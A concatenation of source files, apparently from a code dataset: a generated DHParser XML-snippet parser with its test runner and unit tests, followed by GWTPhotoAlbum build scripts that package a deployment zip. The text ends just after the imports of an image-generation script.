Char = RegExp('\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]')
Chars = RegExp('(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF])+')
CharRef = Alternative(Series(Drop(Text('&#')), RegExp('[0-9]+'), Drop(Text(';'))), Series(Drop(Text('&#x')), RegExp('[0-9a-fA-F]+'), Drop(Text(';'))))
CommentChars = RegExp('(?:(?!-)(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]))+')
PIChars = RegExp('(?:(?!\\?>)(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]))+')
IgnoreChars = RegExp('(?:(?!(?:<!\\[)|(?:\\]\\]>))(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]))+')
CData = RegExp('(?:(?!\\]\\]>)(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]))+')
CharData = RegExp('(?:(?!\\]\\]>)[^<&])+')
PubidChars = RegExp("(?:\\x20|\\x0D|\\x0A|[a-zA-Z0-9]|[-'()+,./:=?;!*#@$_%])+")
PubidCharsSingleQuoted = RegExp('(?:\\x20|\\x0D|\\x0A|[a-zA-Z0-9]|[-()+,./:=?;!*#@$_%])+')
CDSect = Series(Drop(Text('<![CDATA[')), CData, Drop(Text(']]>')))
NameStartChar = RegExp('(?x)_|:|[A-Z]|[a-z]\n |[\\u00C0-\\u00D6]|[\\u00D8-\\u00F6]|[\\u00F8-\\u02FF]\n |[\\u0370-\\u037D]|[\\u037F-\\u1FFF]|[\\u200C-\\u200D]\n |[\\u2070-\\u218F]|[\\u2C00-\\u2FEF]|[\\u3001-\\uD7FF]\n |[\\uF900-\\uFDCF]|[\\uFDF0-\\uFFFD]\n |[\\U00010000-\\U000EFFFF]')
NameChars = RegExp('(?x)(?:_|:|-|\\.|[A-Z]|[a-z]|[0-9]\n |\\u00B7|[\\u0300-\\u036F]|[\\u203F-\\u2040]\n |[\\u00C0-\\u00D6]|[\\u00D8-\\u00F6]|[\\u00F8-\\u02FF]\n |[\\u0370-\\u037D]|[\\u037F-\\u1FFF]|[\\u200C-\\u200D]\n |[\\u2070-\\u218F]|[\\u2C00-\\u2FEF]|[\\u3001-\\uD7FF]\n |[\\uF900-\\uFDCF]|[\\uFDF0-\\uFFFD]\n |[\\U00010000-\\U000EFFFF])+')
Comment = Series(Drop(Text('<!--')), ZeroOrMore(Alternative(CommentChars, RegExp('-(?!-)'))), Drop(Text('-->')))
Name = Series(NameStartChar, Option(NameChars))
PITarget = Series(NegativeLookahead(RegExp('X|xM|mL|l')), Name)
PI = Series(Drop(Text('<?')), PITarget, Option(Series(dwsp__, PIChars)), Drop(Text('?>')))
Misc = OneOrMore(Alternative(Comment, PI, S))
Names = Series(Name, ZeroOrMore(Series(RegExp(' '), Name)))
Nmtoken = Synonym(NameChars)
Nmtokens = Series(Nmtoken, ZeroOrMore(Series(RegExp(' '), Nmtoken)))
PEReference = Series(Drop(Text('%')), Name, Drop(Text(';')))
EntityRef = Series(Drop(Text('&')), Name, Drop(Text(';')))
Reference = Alternative(EntityRef, CharRef)
PubidLiteral = Alternative(Series(Drop(Text('"')), Option(PubidChars), Drop(Text('"'))), Series(Drop(Text("\'")), Option(PubidCharsSingleQuoted), Drop(Text("\'"))))
SystemLiteral = Alternative(Series(Drop(Text('"')), RegExp('[^"]*'), Drop(Text('"'))), Series(Drop(Text("\'")), RegExp("[^']*"), Drop(Text("\'"))))
AttValue = Alternative(Series(Drop(Text('"')), ZeroOrMore(Alternative(RegExp('[^<&"]+'), Reference)), Drop(Text('"'))), Series(Drop(Text("\'")), ZeroOrMore(Alternative(RegExp("[^<&']+"), Reference)), Drop(Text("\'"))))
EntityValue = Alternative(Series(Drop(Text('"')), ZeroOrMore(Alternative(RegExp('[^%&"]+'), PEReference, Reference)), Drop(Text('"'))), Series(Drop(Text("\'")), ZeroOrMore(Alternative(RegExp("[^%&']+"), PEReference, Reference)), Drop(Text("\'"))))
content = Series(Option(CharData), ZeroOrMore(Series(Alternative(element, Reference, CDSect, PI, Comment), Option(CharData))))
Attribute = Series(Name, dwsp__, Drop(Text('=')), dwsp__, AttValue, mandatory=2)
TagName = Capture(Synonym(Name))
emptyElement = Series(Drop(Text('<')), Name, ZeroOrMore(Series(dwsp__, Attribute)), dwsp__, Drop(Text('/>')))
ETag = Series(Drop(Text('</')), Pop(TagName), dwsp__, Drop(Text('>')), mandatory=1)
STag = Series(Drop(Text('<')), TagName, ZeroOrMore(Series(dwsp__, Attribute)), dwsp__, Drop(Text('>')))
VersionNum = RegExp('[0-9]+\\.[0-9]+')
intSubset = RegExp('(?:(?!\\][^\\]])[^<&])+')
ExternalID = Series(Drop(Text('SYSTEM')), S, SystemLiteral, mandatory=1)
doctypedecl = Series(Drop(Text('<!DOCTYPE')), dwsp__, Name, Option(Series(dwsp__, ExternalID)), dwsp__, Option(Series(Drop(Text('[')), intSubset, Drop(Text(']')), dwsp__)), Drop(Text('>')))
No = Text('no')
Yes = Text('yes')
SDDecl = Series(dwsp__, Drop(Text('standalone')), dwsp__, Drop(Text('=')), dwsp__, Alternative(Alternative(Series(Drop(Text("\'")), Yes), Series(No, Drop(Text("\'")))), Alternative(Series(Drop(Text('"')), Yes), Series(No, Drop(Text('"'))))))
EncName = RegExp('[A-Za-z][A-Za-z0-9._\\-]*')
EncodingDecl = Series(dwsp__, Drop(Text('encoding')), dwsp__, Drop(Text('=')), dwsp__, Alternative(Series(Drop(Text("\'")), EncName, Drop(Text("\'"))), Series(Drop(Text('"')), EncName, Drop(Text('"')))))
VersionInfo = Series(dwsp__, Drop(Text('version')), dwsp__, Drop(Text('=')), dwsp__, Alternative(Series(Drop(Text("\'")), VersionNum, Drop(Text("\'"))), Series(Drop(Text('"')), VersionNum, Drop(Text('"')))))
XMLDecl = Series(Drop(Text('<?xml')), VersionInfo, Option(EncodingDecl), Option(SDDecl), dwsp__, Drop(Text('?>')))
prolog = Series(Option(Series(dwsp__, XMLDecl)), Option(Misc), Option(Series(doctypedecl, Option(Misc))))
element.set(Alternative(emptyElement, Series(STag, content, ETag, mandatory=1)))
document = Series(prolog, element, Option(Misc), EOF)
root__ = document
_raw_grammar = ThreadLocalSingletonFactory(XMLSnippetGrammar, ident=1)
def get_grammar() -> XMLSnippetGrammar:
grammar = _raw_grammar()
if get_config_value('resume_notices'):
resume_notices_on(grammar)
elif get_config_value('history_tracking'):
set_tracer(grammar, trace_history)
return grammar
def parse_XMLSnippet(document, start_parser = "root_parser__", *, complete_match=True):
return get_grammar()(document, start_parser, complete_match)
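# Usage sketch (illustrative): the snippet-grammar accepts ordinary element
# syntax, e.g.:
#
#     tree = parse_XMLSnippet('<note id="1">text</note>')
#     print(tree.as_sxpr())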
#######################################################################
#
# AST SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
XMLSnippet_AST_transformation_table = {
# AST Transformations for the XMLSnippet-grammar
"<": flatten,
"document": [],
"prolog": [],
"XMLDecl": [],
"VersionInfo": [],
"VersionNum": [],
"EncodingDecl": [],
"EncName": [],
"SDDecl": [],
"Yes": [],
"No": [],
"doctypedecl": [],
"ExternalID": [],
"intSubset": [],
"element": [replace_or_reduce],
"STag": [],
"ETag": [],
"emptyElement": [],
"TagName": [],
"Attribute": [],
"content": [],
"EntityValue": [replace_or_reduce],
"AttValue": [replace_or_reduce],
"SystemLiteral": [replace_or_reduce],
"PubidLiteral": [replace_or_reduce],
"Reference": [replace_or_reduce],
"EntityRef": [],
"PEReference": [],
"Nmtokens": [],
"Nmtoken": [reduce_single_child],
"Names": [],
"Name": [],
"NameStartChar": [],
"NameChars": [],
"Misc": [],
"Comment": [],
"PI": [],
"PITarget": [],
"CDSect": [],
"PubidCharsSingleQuoted": [],
"PubidChars": [],
"CharData": [],
"CData": [],
"IgnoreChars": [],
"PIChars": [],
"CommentChars": [],
"CharRef": [replace_or_reduce],
"Chars": [],
"Char": [],
"S": [],
"EOF": [],
":Text": reduce_single_child,
"*": replace_by_single_child
}
def CreateXMLSnippetTransformer() -> TransformationFunc:
"""Creates a transformation function that does not share state with other
threads or processes."""
return partial(traverse, processing_table=XMLSnippet_AST_transformation_table.copy())
def get_transformer() -> TransformationFunc:
"""Returns a thread/process-exclusive transformation function."""
THREAD_LOCALS = access_thread_locals()
try:
transformer = THREAD_LOCALS.XMLSnippet_00000001_transformer_singleton
except AttributeError:
THREAD_LOCALS.XMLSnippet_00000001_transformer_singleton = CreateXMLSnippetTransformer()
transformer = THREAD_LOCALS.XMLSnippet_00000001_transformer_singleton
return transformer
#######################################################################
#
# COMPILER SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
class XMLSnippetCompiler(Compiler):
"""Compiler for the abstract-syntax-tree of a XMLSnippet source file.
"""
def __init__(self):
super(XMLSnippetCompiler, self).__init__()
def reset(self):
super().reset()
# initialize your variables here, not in the constructor!
def on_document(self, node):
return self.fallback_compiler(node)
# def on_prolog(self, node):
# return node
# def on_XMLDecl(self, node):
# return node
# def on_VersionInfo(self, node):
# return node
# def on_VersionNum(self, node):
# return node
# def on_EncodingDecl(self, node):
# return node
# def on_EncName(self, node):
# return node
# def on_SDDecl(self, node):
# return node
# def on_Yes(self, node):
# return node
# def on_No(self, node):
# return node
# def on_doctypedecl(self, node):
# return node
# def on_ExternalID(self, node):
# return node
# def on_intSubset(self, node):
# return node
# def on_element(self, node):
# return node
# def on_STag(self, node):
# return node
# def on_ETag(self, node):
# return node
# def on_emptyElement(self, node):
# return node
# def on_TagName(self, node):
# return node
# def on_Attribute(self, node):
# return node
# def on_content(self, node):
# return node
# def on_EntityValue(self, node):
# return node
# def on_AttValue(self, node):
# return node
# def on_SystemLiteral(self, node):
# return node
# def on_PubidLiteral(self, node):
# return node
# def on_Reference(self, node):
# return node
# def on_EntityRef(self, node):
# return node
# def on_PEReference(self, node):
# return node
# def on_Nmtokens(self, node):
# return node
# def on_Nmtoken(self, node):
# return node
# def on_Names(self, node):
# return node
# def on_Name(self, node):
# return node
# def on_NameStartChar(self, node):
# return node
# def on_NameChars(self, node):
# return node
# def on_Misc(self, node):
# return node
# def on_Comment(self, node):
# return node
# def on_PI(self, node):
# return node
# def on_PITarget(self, node):
# return node
# def on_CDSect(self, node):
# return node
# def on_PubidCharsSingleQuoted(self, node):
# return node
# def on_PubidChars(self, node):
# return node
# def on_CharData(self, node):
# return node
# def on_CData(self, node):
# return node
# def on_IgnoreChars(self, node):
# return node
# def on_PIChars(self, node):
# return node
# def on_CommentChars(self, node):
# return node
# def on_CharRef(self, node):
# return node
# def on_Chars(self, node):
# return node
# def on_Char(self, node):
# return node
# def on_S(self, node):
# return node
# def on_EOF(self, node):
# return node
def get_compiler() -> XMLSnippetCompiler:
"""Returns a thread/process-exclusive XMLSnippetCompiler-singleton."""
THREAD_LOCALS = access_thread_locals()
try:
compiler = THREAD_LOCALS.XMLSnippet_00000001_compiler_singleton
except AttributeError:
THREAD_LOCALS.XMLSnippet_00000001_compiler_singleton = XMLSnippetCompiler()
compiler = THREAD_LOCALS.XMLSnippet_00000001_compiler_singleton
return compiler
#######################################################################
#
# END OF DHPARSER-SECTIONS
#
#######################################################################
def compile_src(source):
"""Compiles ``source`` and returns (result, errors, ast).
"""
result_tuple = compile_source(source, get_preprocessor(), get_grammar(), get_transformer(),
get_compiler())
return result_tuple
if __name__ == "__main__":
# recompile grammar if needed
grammar_path = os.path.abspath(__file__).replace('Parser.py', '.ebnf')
parser_update = False
def notify():
global parser_update
parser_update = True
print('recompiling ' + grammar_path)
if os.path.exists(grammar_path):
if not recompile_grammar(grammar_path, force=False, notify=notify):
error_file = os.path.basename(__file__).replace('Parser.py', '_ebnf_ERRORS.txt')
with open(error_file, encoding="utf-8") as f:
print(f.read())
sys.exit(1)
elif parser_update:
print(os.path.basename(__file__) + ' has changed. '
'Please run again in order to apply updated compiler')
sys.exit(0)
else:
print('Could not check whether grammar requires recompiling, '
'because grammar was not found at: ' + grammar_path)
if len(sys.argv) > 1:
# compile file
file_name, log_dir = sys.argv[1], ''
if file_name in ['-d', '--debug'] and len(sys.argv) > 2:
file_name, log_dir = sys.argv[2], 'LOGS'
set_config_value('history_tracking', True)
set_config_value('resume_notices', True)
set_config_value('log_syntax_trees', set(('cst', 'ast')))
start_logging(log_dir)
result, errors, _ = compile_src(file_name)
if errors:
cwd = os.getcwd()
rel_path = file_name[len(cwd):] if file_name.startswith(cwd) else file_name
for error in errors:
print(rel_path + ':' + str(error))
sys.exit(1)
else:
print(result.serialize() if isinstance(result, Node) else result)
else:
print("Usage: XMLSnippetParser.py [FILENAME]")
```
#### File: DHParser/tests/run.py
```python
import concurrent.futures
import doctest
import os
import subprocess
import sys
import time
import threading
scriptdir = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(scriptdir, '../'))
from DHParser.configuration import get_config_value
from DHParser.toolkit import instantiate_executor
lock = None # threading.Lock() initialized in __main__
def run_cmd(parameters: list):
try:
subprocess.run(parameters)
return True
except FileNotFoundError:
return False
def run_doctests(module):
with lock:
namespace = {}
print('DOCTEST ' + module)
exec('import DHParser.' + module, namespace)
mod = getattr(namespace['DHParser'], module)
result = doctest.testmod(mod)
return result.failed
def run_unittests(command):
# print('>>>>>>>> ', command)
args = command.split(' ')
filename = args[1]
print('\nUNITTEST ' + args[0] + ' ' + filename)
subprocess.run(args)
print('COMPLETED ' + args[0] + ' ' + filename + '\n')
if __name__ == "__main__":
lock = threading.Lock()
found = []
if run_cmd(['pypy3', '-V']):
found.append('pypy3 ')
elif run_cmd(['pypy36', '-V']):
found.append('pypy36 ')
elif run_cmd(['pypy', '-V']):
found.append('pypy ')
if run_cmd(['python', '-V']):
output = subprocess.run(['python', '-V'], capture_output=True).stdout
if output.find(b'Python 3') >= 0:
found.append('python ')
    elif run_cmd(['python3', '-V']):
        found.append('python3 ')
# if run_cmd(['python3.5', '-V']):
# found.append('python3.5 ')
# elif run_cmd(['~/.local/bin/python3.5', '-V']):
# found.append('~/.local/bin/python3.5 ')
if run_cmd(['python3.6', '-V']):
found.append('python3.6 ')
elif run_cmd(['~/.local/bin/python3.6', '-V']):
found.append('~/.local/bin/python3.6 ')
if run_cmd(['python3.7', '-V']):
found.append('python3.7 ')
elif run_cmd(['~/.local/bin/python3.7', '-V']):
found.append('~/.local/bin/python3.7 ')
if run_cmd(['python3.8', '-V']):
found.append('python3.8 ')
elif run_cmd(['~/.local/bin/python3.8', '-V']):
found.append('~/.local/bin/python3.8 ')
if run_cmd(['python3.9', '-V']):
found.append('python3.9 ')
elif run_cmd(['~/.local/bin/python3.9', '-V']):
found.append('~/.local/bin/python3.9 ')
if run_cmd(['python3.10', '-V']):
found.append('python3.10 ')
elif run_cmd(['~/.local/bin/python3.10', '-V']):
found.append('~/.local/bin/python3.10 ')
print('Interpreters found: ' + ''.join(found))
arguments = [arg for arg in sys.argv[1:] if arg[:1] != '-']
if len(arguments) > 1:
# use interpreters from command line
interpreters = []
for interpreter in arguments:
interpreter = interpreter.strip() + ' '
if interpreter not in found:
                print('Interpreter ' + interpreter + ' not found.')
sys.exit(1)
else:
interpreters.append(interpreter)
else:
interpreters = found
cwd = os.getcwd()
os.chdir(os.path.join(scriptdir, '..'))
timestamp = time.time()
run_doctests('toolkit')
with instantiate_executor(get_config_value('test_parallelization'),
concurrent.futures.ProcessPoolExecutor) as pool:
results = []
# doctests
for filename in os.listdir('DHParser'):
if filename.endswith('.py') and filename not in \
("foreign_typing.py", "shadow_cython.py", "versionnumber.py",
"__init__.py"):
results.append(pool.submit(run_doctests, filename[:-3]))
# unit tests
for interpreter in interpreters:
if run_cmd([interpreter.strip(), '--version']):
for filename in os.listdir('tests'):
if filename.endswith('.py') and (filename.startswith('test_') or
filename.startswith('notest')):
command = interpreter + os.path.join('tests', filename)
results.append(pool.submit(run_unittests, command))
done, not_done = concurrent.futures.wait(results, timeout=120)
assert not not_done, str(not_done)
elapsed = time.time() - timestamp
print('\n Test-Duration: %.2f seconds' % elapsed)
print('\nPlease note, the following phenomena are not bugs:')
print(' 1. Some doctests may fail on Windows, due to different file-separators.')
print(' 2. Some tests end with OSError("handle already closed") on pypy3.6, 3.7. '
'This seems to be a python < 3.9 bug. See: pypy3 scratch/process_pool_doc_examples.py')
os.chdir(cwd)
```
#### File: DHParser/tests/test_compile.py
```python
import copy
import os
import sys
scriptpath = os.path.dirname(__file__) or '.'
sys.path.append(os.path.abspath(os.path.join(scriptpath, '..')))
from DHParser.syntaxtree import parse_sxpr
from DHParser.compile import Compiler
class ZeroTestCompiler(Compiler):
pass
class SerializingTestCompiler(Compiler):
def serialize(self, node):
if node.children:
content = [self.compile(child) for child in node.children]
return ' '.join(['(' + node.tag_name] + content) + ')'
else:
return '(' + node.tag_name + ' ' + node.content + ')'
def on_A(self, node):
return self.serialize(node)
def on_B(self, node):
return self.serialize(node)
def on_C(self, node):
return self.serialize(node)
def on_D(self, node):
return self.serialize(node)
def on_E(self, node):
return self.serialize(node)
def on_F(self, node):
return self.serialize(node)
class TestCompilerClass:
original = parse_sxpr('(A (B "1") (C (D (E "2") (F "3"))))')
def test_zero_compiler(self):
"""Tests the fallback-method and boilerplate of the compiler."""
tree = copy.deepcopy(self.original)
compiler = ZeroTestCompiler()
tree = compiler.compile(tree)
assert tree.equals(self.original), tree.as_sxpr()
def test_non_Node_return_type(self):
"""Tests a compiler that returns strings, not Nodes."""
tree = copy.deepcopy(self.original)
compiler = SerializingTestCompiler()
s = compiler.compile(tree)
assert s == "(A (B 1) (C (D (E 2) (F 3))))"
def test_fallback_failure1(self):
"""Tests failure when leaf-node is mistakenly handled by fallback."""
tree = copy.deepcopy(self.original)
compiler = SerializingTestCompiler()
compiler.on_F = compiler.fallback_compiler
try:
s = compiler.compile(tree)
assert False, "TypeError expected"
except TypeError:
pass
def test_fallback_failure2(self):
"""Tests failure when branch-node is mistakenly handled by fallback."""
tree = copy.deepcopy(self.original)
compiler = SerializingTestCompiler()
compiler.on_D = compiler.fallback_compiler
try:
s = compiler.compile(tree)
assert False, "TypeError expected"
except TypeError as e:
assert "DHParser.compile.Compiler.fallback_compiler()" in str(e), \
"Incorrect Error Message: " + str(e)
pass
if __name__ == "__main__":
from DHParser.testing import runner
runner("", globals())
```
#### File: DHParser/tests/test_server_utils.py
```python
import asyncio
import concurrent.futures
import collections.abc
import json
import os
import sys
import traceback
scriptpath = os.path.dirname(__file__) or '.'
sys.path.append(os.path.abspath(os.path.join(scriptpath, '..')))
from DHParser.server import pp_json, ExecutionEnvironment, asyncio_run
from DHParser.toolkit import json_dumps, json_encode_string
class TestExecutionEnvironment:
def test_execenv(self):
def fault():
raise AssertionError
async def main():
loop = asyncio.get_running_loop() if sys.version_info >= (3, 7) \
else asyncio.get_event_loop()
env = ExecutionEnvironment(loop)
return await env.execute(None, fault, [])
result, rpc_error = asyncio_run(main())
json_str = '{"jsonrpc": "2.0", "error": {"code": %i, "message": %s}}' % \
(rpc_error[0], json_encode_string(rpc_error[1]))
assert json_str.find('Traceback') >= 0
class TestUtils:
data = ('{"jsonrpc":"2.0","id":0,"method":"initialize","params":{"processId":17666,'
'"rootPath":"/home/eckhart/Entwicklung/DHParser/examples/EBNF_fork","rootUri":'
'"file:///home/eckhart/Entwicklung/DHParser/examples/EBNF_fork","capabilities":'
'{"workspace":{"applyEdit":true,"workspaceEdit":{"documentChanges":true},'
'"didChangeConfiguration":{"dynamicRegistration":true},"didChangeWatchedFiles":'
'{"dynamicRegistration":true},"symbol":{"dynamicRegistration":true,"symbolKind":'
'{"valueSet":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,'
'26]}},"executeCommand":{"dynamicRegistration":true},"configuration":true,'
'"workspaceFolders":true},"textDocument":{"publishDiagnostics":'
'{"relatedInformation":true},"synchronization":{"dynamicRegistration":true,'
'"willSave":true,"willSaveWaitUntil":true,"didSave":true},"completion":'
'{"dynamicRegistration":true,"contextSupport":true,"completionItem":'
'{"snippetSupport":true,"commitCharactersSupport":true,"documentationFormat":'
'["markdown","plaintext"],"deprecatedSupport":true,"preselectSupport":true},'
'"completionItemKind":{"valueSet":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,'
'19,20,21,22,23,24,25]}},"hover":{"dynamicRegistration":true,"contentFormat":'
'["markdown","plaintext"]},"signatureHelp":{"dynamicRegistration":true,'
'"signatureInformation":{"documentationFormat":["markdown","plaintext"]}},'
'"definition":{"dynamicRegistration":true},"references":{"dynamicRegistration":'
'true},"documentHighlight":{"dynamicRegistration":true},"documentSymbol":'
'{"dynamicRegistration":true,"symbolKind":{"valueSet":[1,2,3,4,5,6,7,8,9,10,11,'
'12,13,14,15,16,17,18,19,20,21,22,23,24,25,26]},'
'"hierarchicalDocumentSymbolSupport":true},"codeAction":{"dynamicRegistration":'
'true,"codeActionLiteralSupport":{"codeActionKind":{"valueSet":["","quickfix",'
'"refactor","refactor.extract","refactor.inline","refactor.rewrite","source",'
'"source.organizeImports"]}}},"codeLens":{"dynamicRegistration":true},'
'"formatting":{"dynamicRegistration":true},"rangeFormatting":'
'{"dynamicRegistration":true},"onTypeFormatting":{"dynamicRegistration":true},'
'"rename":{"dynamicRegistration":true},"documentLink":{"dynamicRegistration":'
'true},"typeDefinition":{"dynamicRegistration":true},"implementation":'
'{"dynamicRegistration":true},"colorProvider":{"dynamicRegistration":true},'
'"foldingRange":{"dynamicRegistration":true,"rangeLimit":5000,"lineFoldingOnly":'
'true}}},"trace":"off","workspaceFolders":[{"uri":'
'"file:///home/eckhart/Entwicklung/DHParser/examples/EBNF_fork",'
'"name":"EBNF_fork"}]}}')
expected = """{
"jsonrpc": "2.0",
"id": 0,
"method": "initialize",
"params": {
"processId": 17666,
"rootPath": "/home/eckhart/Entwicklung/DHParser/examples/EBNF_fork",
"rootUri": "file:///home/eckhart/Entwicklung/DHParser/examples/EBNF_fork",
"capabilities": {
"workspace": {
"applyEdit": true,
"workspaceEdit": {"documentChanges": true},
"didChangeConfiguration": {"dynamicRegistration": true},
"didChangeWatchedFiles": {"dynamicRegistration": true},
"symbol": {
"dynamicRegistration": true,
"symbolKind": {
"valueSet": [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26]}},
"executeCommand": {"dynamicRegistration": true},
"configuration": true,
"workspaceFolders": true},
"textDocument": {
"publishDiagnostics": {"relatedInformation": true},
"synchronization": {
"dynamicRegistration": true,
"willSave": true,
"willSaveWaitUntil": true,
"didSave": true},
"completion": {
"dynamicRegistration": true,
"contextSupport": true,
"completionItem": {
"snippetSupport": true,
"commitCharactersSupport": true,
"documentationFormat": ["markdown","plaintext"],
"deprecatedSupport": true,
"preselectSupport": true},
"completionItemKind": {
"valueSet": [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25]}},
"hover": {
"dynamicRegistration": true,
"contentFormat": ["markdown","plaintext"]},
"signatureHelp": {
"dynamicRegistration": true,
"signatureInformation": {
"documentationFormat": ["markdown","plaintext"]}},
"definition": {"dynamicRegistration": true},
"references": {"dynamicRegistration": true},
"documentHighlight": {"dynamicRegistration": true},
"documentSymbol": {
"dynamicRegistration": true,
"symbolKind": {
"valueSet": [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26]},
"hierarchicalDocumentSymbolSupport": true},
"codeAction": {
"dynamicRegistration": true,
"codeActionLiteralSupport": {
"codeActionKind": {
"valueSet": ["","quickfix","refactor","refactor.extract","refactor.inline","refactor.rewrite","source","source.organizeImports"]}}},
"codeLens": {"dynamicRegistration": true},
"formatting": {"dynamicRegistration": true},
"rangeFormatting": {"dynamicRegistration": true},
"onTypeFormatting": {"dynamicRegistration": true},
"rename": {"dynamicRegistration": true},
"documentLink": {"dynamicRegistration": true},
"typeDefinition": {"dynamicRegistration": true},
"implementation": {"dynamicRegistration": true},
"colorProvider": {"dynamicRegistration": true},
"foldingRange": {
"dynamicRegistration": true,
"rangeLimit": 5000,
"lineFoldingOnly": true}}},
"trace": "off",
"workspaceFolders": [{
"uri": "file:///home/eckhart/Entwicklung/DHParser/examples/EBNF_fork",
"name": "EBNF_fork"}]}}"""
def test_pp_json(self):
obj = json.loads(self.data)
serialized = pp_json(obj)
assert sys.version_info < (3, 6) or serialized == self.expected, serialized
def test_pp_json_stacktrace(self):
try:
raise AssertionError()
except AssertionError:
tb = traceback.format_exc()
ppjsn = pp_json({'error' : tb}).replace('\\\\', '/')
expected = '{"error": "Traceback (most recent call last):"\n' \
' " File \\"$SCRIPTPATH/test_server_utils.py\\", ' \
'line 178, in test_pp_json_stacktrace"\n' \
' " raise AssertionError()"\n' \
' "AssertionError"\n ""}'.\
replace('$SCRIPTPATH', scriptpath.replace('\\', '/'), 1).replace('./', '')
# print(ppjsn)
# print(expected)
assert ppjsn == expected, '\n\n' + ppjsn + '\n\n' + expected
if __name__ == "__main__":
from DHParser.testing import runner
runner("", globals())
```
|
{
"source": "jecki/gwtphotoalbum",
"score": 2
}
|
#### File: GWTPhotoAlbum/scripts/genDeploymentPackage.py
```python
import sys, os
try:
import zipfile
except ImportError:
import zipfile_py2x as zipfile
class emptyCompressor(object):
def __init__(self, fileName):
pass
def write(self, src, arcName):
pass
def close(self):
pass
try:
from PyQt4.Qt import QByteArray, qCompress
class QtCompressor(object):
def __init__(self, fileName):
# fileName = os.path.splitext(fileName)[0] + ".qz"
self.fileName = fileName
self.byteArray = QByteArray()
def toHexStr(self, i):
s = hex(i)
k = 10 - len(s)
return s[0:2] + "0"*k + s[2:]
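# Doctest-style sketch of the record framing used below: every field is
# preceded by a fixed-width (10 character) hexadecimal length, e.g.
# >>> QtCompressor("dummy.qa").toHexStr(26)
# '0x0000001a'
# so a record reads: 10-char hex name length, name, 10-char hex data length, data.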
def write(self, src, arcName):
g = open(src, "rb")
data = g.read()
g.close()
self.byteArray.append(self.toHexStr(len(arcName)))
self.byteArray.append(arcName)
self.byteArray.append(self.toHexStr(len(data)))
self.byteArray.append(data)
def close(self):
f = open(self.fileName, "wb")
# don't use compression, because resource files are compressed by Qt anyway
data = self.byteArray.data() #data = qCompress(self.byteArray, 9).data()
f.write(data)
f.close()
except ImportError:
QtCompressor = emptyCompressor
source_dir = "../war"
version_file_path = "../VERSION.txt"
dest_file_name = "GWTPhotoAlbum-Deploy.zip"
qz_file_name = "../albumcreator/common/data/GWTPhotoAlbum-Deploy.qa"
if not os.path.exists(os.path.dirname(qz_file_name)):
print ("No albumcreator sources: Won't create GWTPhotoAlbum-Deploy.qa!")
QtCompressor = emptyCompressor
def verify_source_dir():
if not os.path.isdir(source_dir):
print ("error: "+source_dir+" is not a valid directory")
return False
names = os.listdir(source_dir)
if "icons" not in names:
print ("error: "+source_dir+"does not contain an 'icons' subdirctory")
return False
if "GWTPhotoAlbum" not in names:
print ("error: "+source_dir+"does not contain an 'GWTPhotoAlbum' subdirctory")
return False
l = [entry for entry in names if entry.endswith(".html")]
if len(l) == 0:
print ("error: "+source_dir+"does not contain any html files")
return False
return True
def assemble():
f = zipfile.ZipFile(dest_file_name, "w", zipfile.ZIP_DEFLATED)
g = QtCompressor(qz_file_name)
f.write(version_file_path, "VERSION.txt")
g.write(version_file_path, "VERSION.txt")
try:
def visit(arg, dirname, names):
pathname = (os.path.normpath(dirname[len(source_dir):]), "")
while pathname[0] not in ["", "/"]:
pathname = os.path.split(pathname[0])
if pathname[1] not in ["GWTPhotoAlbum", "icons", "."] or \
dirname.find(".svn") >= 0:
print ("ignoring directory: " + dirname)
return
else:
print ("including directory: " + dirname)
if os.path.samefile(dirname, source_dir):
for entry in names[:]:
if entry.find("Demo") >= 0 \
or (os.path.isdir(os.path.join(dirname, entry)) \
and entry not in ("gwt", "icons", # "GWTPhotoAlbum"
"GWTPhotoAlbum")) \
or entry in ["index.html", "index_offline.html",
"GWTPhotoAlbum_offline.html",
"GWTPhotoAlbum_xs.html"] \
or entry.find("_fat") >= 0 \
or entry.startswith("noscript_") :
print ("ignoring: "+entry)
names.remove(entry)
for entry in names[:]:
if entry.find(".svn") >= 0 or entry in ["hosted.html"]:
print ("ignoring: "+entry)
names.remove(entry)
for entry in names:
absolute_path = os.path.join(dirname, entry)
if not os.path.isdir(absolute_path):
relative_path = absolute_path[len(source_dir)+1:]
# if entry == "GWTPhotoAlbum.html" or entry == "GWTPhotoAlbum.css":
# relative_path = os.path.join("GWTPhotoAlbum", relative_path)
print ("adding: "+relative_path)
f.write(absolute_path, relative_path)
g.write(absolute_path, relative_path)
try:
os.path.walk(source_dir, visit, None)
except AttributeError: # python3 !
for dirpath, dirnames, filenames in os.walk(source_dir):
visit(0, dirpath, dirnames + filenames)
# except zipfile.error, IOError:
# print ("Error writing zip-file!")
finally:
f.close()
g.close()
if __name__ == "__main__":
if "-h" in sys.argv or "--help" in sys.argv:
print (__doc__)
else:
if len(sys.argv) > 1:
source_dir = sys.argv[1]
if len(sys.argv) > 2:
dest_file_name = sys.argv[2]
if len(sys.argv) > 3:
qz_file_name = sys.argv[3]
if verify_source_dir():
print ("source directory: " + source_dir)
print ("destination file: " + dest_file_name)
print ("qz archive file: " + qz_file_name)
assemble()
```
#### File: GWTPhotoAlbum/scripts/genNavigationImages.py
```python
import os, sys
from math import sqrt
from PIL import Image, ImageFile
